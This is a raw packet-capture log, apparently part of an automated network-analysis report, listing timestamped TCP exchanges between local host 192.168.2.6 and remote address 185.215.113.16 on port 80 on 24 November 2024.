                                                                                                                                                                                              Nov 24, 2024 13:39:29.618824959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.632110119 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.655730963 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.655786037 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.655838013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.656069040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.656105995 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.656254053 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.657022953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.657063961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.657094955 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.657877922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.657921076 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.658004045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.658751011 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.658804893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.658804893 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.659568071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.659636021 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.659688950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.660466909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.660538912 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.660573959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.661359072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.661437035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.661443949 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.662242889 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.662296057 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.662365913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.663110971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.663189888 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.663234949 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.664006948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.664052010 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.664150953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.664907932 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.664949894 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.664999962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.665769100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.665811062 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.665862083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.666734934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.666780949 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.666814089 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.667493105 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.667541981 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.667583942 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.668371916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.668489933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.668544054 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.669236898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.669286013 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.669331074 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.670289040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.670372009 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.670391083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.671006918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.671044111 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.671106100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.671911001 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.672000885 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.672080994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.672787905 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.672827959 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.672857046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.673636913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.673732042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.673768044 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.674505949 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.674546003 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.674591064 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.675446987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.675578117 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.675580025 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.676260948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.676311016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.676333904 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.677143097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.677185059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.677259922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.678055048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.678070068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.678105116 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.678908110 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.678946972 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.679065943 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.679778099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.679820061 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.679886103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.680674076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.680716991 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.680772066 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.681540012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.681580067 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.681652069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.682463884 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.682540894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.682615042 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.683296919 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.683339119 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.683409929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.684191942 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.684246063 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.684250116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.685056925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.685098886 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.685139894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.686043024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.686094999 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.686115026 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.686892033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.686937094 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.686978102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.688010931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.688045979 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.688184023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.690103054 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.690123081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.690140009 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.690148115 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.690176964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.690182924 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.691756964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.691776991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.691792965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.691809893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.691816092 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.691845894 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.692274094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.692293882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.692339897 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.693007946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.693053007 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.693105936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.693850994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.693953991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.693964005 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.694695950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.694741964 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.694813967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.695606947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.695653915 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.695698023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.696502924 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.696556091 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.696576118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.697401047 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.697535992 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.697577953 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.698240042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.698354006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.698391914 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.827868938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.827982903 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.828030109 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.828267097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.828303099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.828439951 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.829032898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.829348087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.829392910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.829421997 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.866058111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.866102934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.866278887 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.866292953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.866309881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.866333008 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.867171049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.867213011 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.867290974 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.868084908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.868132114 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.868185043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.868921995 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.869029999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.869071007 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.869791985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.869834900 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.869877100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.870651960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.870688915 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.870745897 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.871551991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.871589899 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.871650934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.872471094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.872510910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.872555017 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.873313904 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.873373985 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.873416901 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.874176025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.874213934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.874278069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.875061989 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.875113010 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.875164032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.875942945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.875992060 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.876058102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.876817942 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.876944065 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.876956940 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.877717018 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.877762079 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.878010035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.878606081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.878649950 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.878678083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.879456997 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.879498005 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.879561901 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.880398989 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.880443096 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.880471945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.881232977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.881300926 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.881534100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.882330894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.882381916 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.882460117 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.883295059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.883332014 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.883399963 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.884072065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.884154081 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.884305000 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.885085106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.885128975 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.885171890 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.885766029 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.885824919 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.885862112 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.886487961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.886540890 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.886643887 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.887372971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.887409925 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.887438059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.888262033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.888386965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.888433933 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.889245033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.889292002 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.889308929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.890027046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.890074968 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.890141010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.890903950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.890937090 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.890944958 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.891752958 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.891799927 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.891843081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.892636061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.892683983 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.892810106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.893568993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.893610954 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.893652916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.894556046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.894625902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.894649029 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.895330906 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.895426989 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.895446062 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.896231890 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.896250010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.896276951 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.897109032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.897155046 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.897329092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.898087978 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.898130894 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.898192883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.898969889 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.899009943 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.899072886 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.899840117 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.899893045 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.899950027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.900631905 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.900724888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.900763988 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.901490927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.901593924 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.901628017 CET4975280192.168.2.6185.215.113.16
